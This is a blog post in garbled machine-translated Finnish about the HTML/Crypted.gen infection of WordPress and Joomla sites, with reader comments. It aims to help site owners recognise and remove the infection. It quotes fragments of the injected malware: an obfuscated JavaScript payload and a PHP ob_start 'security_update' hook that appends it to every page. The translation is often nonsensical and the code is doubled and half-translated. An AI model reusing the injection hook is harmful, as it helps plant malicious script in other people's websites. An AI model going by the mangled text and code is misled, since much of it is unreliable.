imaginepaolo, mielikuvitus ei ole seinää




HTML / Crypted.gen iskujen WordPress ja Joomla

Kommentoi 12 marraskuu 2009 7 (2428 katselua)

Luokiteltu under: Ajankohtaista

Jaa tämä artikkeli Facebookissa

Mielenkiintoinen selitys hyökkäyksen tehnyt imaginepaolo http://www.settorezero.com/ :

Se tapahtuu useammin tapahtumat, että monet sivustot perustuu WordPress ja Joomla ovat hyökänneet tavalla tai Troijan raportoitu Avira HTML / Crypted.gen. Tiedä, jos tämä on ongelma vikoja näissä kahdessa julkaisujärjestelmät (mutta epäilen sitä) tai pikemminkin siltä, että virus hyökkäsi palvelimet että vastaanottavan tällaisia sivustoja.

Jälkimmäisessä tapauksessa olin tukee se, että kaikki ihmiset otin yhteyttä ja joka on ollut sama ongelma, kaikki ovat isännöi samana mukaan. Sit vielä maksut nyt, koska se on hieman poikkeava ja verkostoitumista enkä ole löytänyt riittävästi tietoa, jotta oletus voimassa, joten minun on vain arvauksia ja otettava sellaisenaan.

Samaan aikaan toivon, että tämä viesti voi olla hyödyllistä ja keskustellaan ymmärtää, missä ongelma on peräisin.

Ensinnäkin on sanottava, että virus muuttaa sivuja (mutta ei aina kaikille sivuille), joiden tunniste html, php, asp ja JS lisäämällä salattu javascript-koodin, joka alkaa enemmän tai vähemmän kuin tämä:

  "javascript" > $a = \ "Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0} <script Kieli = "javascript"> $ = \ "Z64dZ3dZ22q | jos | qdu] qwys rub8tqiZ3c0 ^ e)) 

Sanon "enemmän tai vähemmän", koska kaikki eivät näyttää samalta, mutta se on helppo tunnistaa haitallisen koodin, koska näemme, on hieman himmentää: avainsanat eivät ole lukenut, mutta vain sarjoissa merkkiä näennäisesti järjetöntä.

Suhteellisen WordPress kuitenkin haitallisen koodin yleensä lisätään jokaiselle sivulle "index.php" ja alkaa näin:

  1 
  ( "security_update" ) ; function security_update ( $buffer ) { return $buffer . "<script language= \" javascript \" > $a = \" Z64dZ3dZ22q|se|qdu]qwys^e} <? Php ob_start (security_update ")-toiminnon security_update ($ puskuri) (return $ puskuri." <script Language= \" javascript \"> $ = \ "Z64dZ3dZ22q | jos | qdu] qwys ^ e) 

Näyttää siltä, että kirjoitus ei aiheuttaa vahinkoa ja todetaan vain Avira (nopea). Ongelma on ratkaistu poistamalla komentosarjan sivuilta haitallisiksi tai maksujen normaali kopio sivujen palvelimelle.

Jotkut käyttäjät kuitenkin saatuaan virus, se löytyy kopio sivuston (tai muu www-sivut) tallennetaan tietokoneeseen tämän ongelman, niin hyökkäys näyttää "paikallisia" eikä etäinen: sivut näyttävät kimppuun samassa tietokoneessa, jossa he asuvat. Tämä saa minut ajattelemaan yhä enemmän se hosting ongelma: itse asiassa monet ovat heidän PC ja kopio tartuntalähde, kun palvelin on kuitenkin esitettävä tämä kirjoitus sivua.

Ratkaisu voisi viedä on aina ajankohtainen varmuuskopio sinun sivustoon tietokoneella ja tilata enintään verkkosivuilla, kun ei ole toimitettu.

Lainaan tässä muutamia hyödyllisiä linkkejä (enimmäkseen wordpress) liittyvä ongelma edellä:

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://www.wordpress-it.it/forum/topic/12452

WordPress 2.8.5, yli 100 Hacker hyökkäykset Aruba

Related Posts

  • Ei aiheeseen liittyviä post


Mainos

Web Design Agency




Olla vuorovaikutuksessa

Web Design Twitter
Tiedote
Web Design Twitter
Viserrys

Facebook

LinkedIn

Facebook Fan Page


Web Design Resources

WooThemes WooThemes - WordPress teemoja kaikille GraphicRiver GraphicRiver GraphicRiver GraphicRiver

7 r9isposte on "HTML / Crypted.gen iskujen WordPress ja Joomla"

  1. [...] UHKIEN Bland - Näyttää siltä, että on uhka lähes heti löytänyt vain Avira (ja [...]

  2. Minulle tapahtui kaksi kertaa 20 päivää. :-D

  3. Arianna kirjoittaa:

    Se tapahtui minulle samanlainen hyökkäys (ei voi muistaa, jos koodi on sama) viime vuoden marraskuussa.
    Löysin ja poistaa haitallisen koodin kanssa ampua Antivirus WordPress. Olen kuitenkin tehnyt, mitä olin lukenut oli parasta tehdä: I asentanut kaiken teema plugins, olen myös vaihtanut url ja salasana. Sen jälkeen, ja nyt kaikki on hyvin ... mutta minä sanon hiljaa.

    Hei!

  4. Valentina sanoo:

    Yritän etsiä koodia, että olet antanut, mutta silti ei mitään. Latasin kaikki blogini paitsi Julkinen kansio ja mdb-tietokannasta.
    : (

  5. [...] Hei haloo Turbo Kannattaa siis Joomla foorumi, toiset on sama ongelma. HTML / Crypted.gen iskujen WordPress ja Joomla | Web Design [Vastattu + kysymys] html / crypted.gen HTML / Crypted.gen iskujen WordPress ja Joomla | Teollisuus [...]

  6. Louis kirjoittaa:

    Kiitos!
    Olen ratkaissut ongelman poistamalla kirjoitus.
    Nimettiin indeksi kaikki sivut, vaikka ne index_1. index_old kopioita vanhoista muutoksista.

    Kiitos vielä kerran ... Olen velkaa sinulle hyväksi : P

  7. Neuville kirjoittaa:

    Hei,
    sama tapahtui minulle, ei ole ensimmäinen kerta Aruba (toimittaja), mutta se tapahtui 7 tai 8 kertaa alkaa ajatella, että tällaiset hyökkäykset, joiden tarkoituksena myydä antivirus palvelu on vapaaehtoinen ja maksaa: Tietenkin Toimittaja muuttaa valon nopeudella.

    Omat epäilykset melko kohtuullisia, myös siitä, että edellinen hyökkäys minä vain aktiivisia plugins (kaikki "sertifioitu" ja ladata wp.org) ja rakensin mallin yksin ... tässä vaiheessa, koska Ongelma on aina vain kuuluvat alueet isännöi Aruba Minulla on täysi syy epäillä kesä ... liian huono, mutta jos voin viikonloppuna ostan toisen hosting. jos olet ehdotukset ovat tervetulleita

    En usko, että tämä haavoittuvuus WordPress, olen versio 2.9.2, joka oli hyvä pitkään ja on vakaa (itse asiassa en päivitä 3 pelossa iskut)

Jätä kommentti



Hae tästä sivustosta Google




Creative Commons License
Tämä työ on lisensoitu Creative Commons License .